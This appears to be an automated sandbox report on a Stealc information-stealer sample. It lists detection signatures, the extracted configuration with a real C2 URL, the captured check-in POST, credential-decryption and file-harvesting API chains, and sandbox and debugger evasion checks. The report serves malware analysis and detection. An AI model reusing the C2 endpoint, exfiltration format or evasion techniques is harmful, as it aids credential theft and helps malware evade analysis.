Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544876
MD5:264daa04defc6b3cb7cd8b682db05acd
SHA1:10f55121d698817f1960530cbec2bd1da8564a8d
SHA256:4a39c54963c15bf5b9388247e2a83ca5bbb1b69ca3e016ad75c8cea50a99a43a
Tags:exeuser-Bitsight

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 264DAA04DEFC6B3CB7CD8B682DB05ACD)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 3624 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 3624 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.c80000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T20:43:17.658007+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

                AV Detection

                Source: file.exeAvira: detected
                Source: 0.2.file.exe.c80000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Source: file.exeReversingLabs: Detection: 39%
                Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C99030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C872A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C8A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C8A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C8C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C8E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C81710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C81710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C94B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C94B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C93B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C93B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C8EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8DF10

                Networking

                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 45 41 42 45 43 46 38 41 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"2DEABECF8A942138104604------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"tale------HDGCFHIDAKECFHIEBFCG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C862D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 45 41 42 45 43 46 38 41 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"2DEABECF8A942138104604------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"tale------HDGCFHIDAKECFHIEBFCG--
                Source: file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                Source: file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/405117-2476756634-1003
                Source: file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php_
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/~gq
                Source: file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC00980_2_00CC0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F20_2_010E31F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E002E0_2_010E002E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDB1980_2_00CDB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB21380_2_00CB2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC42880_2_00CC4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEE2580_2_00CEE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010693ED0_2_010693ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DE2300_2_010DE230
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFD39E0_2_00CFD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0108C2950_2_0108C295
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B3080_2_00D0B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E82D00_2_010E82D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC45A80_2_00CC45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CED5A80_2_00CED5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAE5440_2_00CAE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA45730_2_00CA4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D74CA0_2_010D74CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC66C80_2_00CC66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D096FD0_2_00D096FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFA6480_2_00CFA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF67990_2_00CF6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D66C90_2_010D66C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDD7200_2_00CDD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEF8D60_2_00CEF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDB8A80_2_00CDB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD98B80_2_00CD98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DC9970_2_010DC997
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD48680_2_00CD4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010169F10_2_010169F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010EB8390_2_010EB839
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D98B60_2_010D98B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE8BD90_2_00CE8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF0B880_2_00CF0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF4BA80_2_00CF4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F82CA00_2_00F82CA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E4DB40_2_010E4DB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFAC280_2_00CFAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD4DC80_2_00CD4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD5DB90_2_00CD5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDBD680_2_00CDBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB1D780_2_00CB1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEAD380_2_00CEAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF1EE80_2_00CF1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010D3F900_2_010D3F90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC8E780_2_00CC8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01027E1D0_2_01027E1D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C84610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: iuotgoma ZLIB complexity 0.9950269020915429
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C99790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C93970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C93970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\VLLCSI2L.htm
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exeReversingLabs: Detection: 39%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exeStatic file information: File size 2127360 > 1048576
                Source: file.exeStatic PE information: Raw size of iuotgoma is bigger than: 0x100000 < 0x19c600
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iuotgoma:EW;ujumrvwn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iuotgoma:EW;ujumrvwn:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C99BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21457b should be: 0x211c49
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iuotgoma
                Source: file.exeStatic PE information: section name: ujumrvwn
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100310B push 078BDE3Bh; mov dword ptr [esp], esp0_2_01003197
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100310B push ecx; mov dword ptr [esp], eax0_2_010031AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100310B push 2FD7EA51h; mov dword ptr [esp], edx0_2_01003217
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAA0DC push eax; retf 0_2_00CAA0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115F109 push ebx; mov dword ptr [esp], edi0_2_0115F146
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAE0AA push esi; mov dword ptr [esp], edi0_2_00FAE134
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0117014D push ecx; mov dword ptr [esp], ebp0_2_011701CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118018E push 59CC6C41h; mov dword ptr [esp], eax0_2_011801CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118018E push edi; mov dword ptr [esp], 75A76F31h0_2_0118021E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push edi; mov dword ptr [esp], 5C7B36DFh0_2_013A9187
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push ebx; mov dword ptr [esp], edx0_2_013A91A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push 0377B707h; mov dword ptr [esp], ecx0_2_013A9291
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push 1168DDA5h; mov dword ptr [esp], eax0_2_013A92AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013A9186 push eax; mov dword ptr [esp], ebx0_2_013A92DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114F1C4 push 2F44066Bh; mov dword ptr [esp], edi0_2_0114F1D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0114F1C4 push 0304AFC6h; mov dword ptr [esp], ebx0_2_0114F32B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push esi; mov dword ptr [esp], edx0_2_01163214
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push 51B55B4Bh; mov dword ptr [esp], eax0_2_01163239
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push esi; mov dword ptr [esp], ebp0_2_01163262
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011631CD push 2553DE1Ah; mov dword ptr [esp], edx0_2_011632A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011871FD push ebp; mov dword ptr [esp], 47FE245Bh0_2_0118721D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B91E3 push eax; mov dword ptr [esp], esp0_2_011B9220
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push edi; mov dword ptr [esp], eax0_2_010E31F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push ebp; mov dword ptr [esp], 55206004h0_2_010E32D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push ebp; mov dword ptr [esp], 74FE1FF7h0_2_010E3331
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push edi; mov dword ptr [esp], eax0_2_010E33FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push esi; mov dword ptr [esp], edx0_2_010E347B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push 553AF153h; mov dword ptr [esp], edx0_2_010E34C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push 2DA5B1AFh; mov dword ptr [esp], eax0_2_010E3533
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push 489A9AB2h; mov dword ptr [esp], ebp0_2_010E359C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E31F2 push ebx; mov dword ptr [esp], 4AD38300h0_2_010E35A0
                Source: file.exeStatic PE information: section name: iuotgoma entropy: 7.954742797276652

                Boot Survival

                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C99BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C99BB0

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37858
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
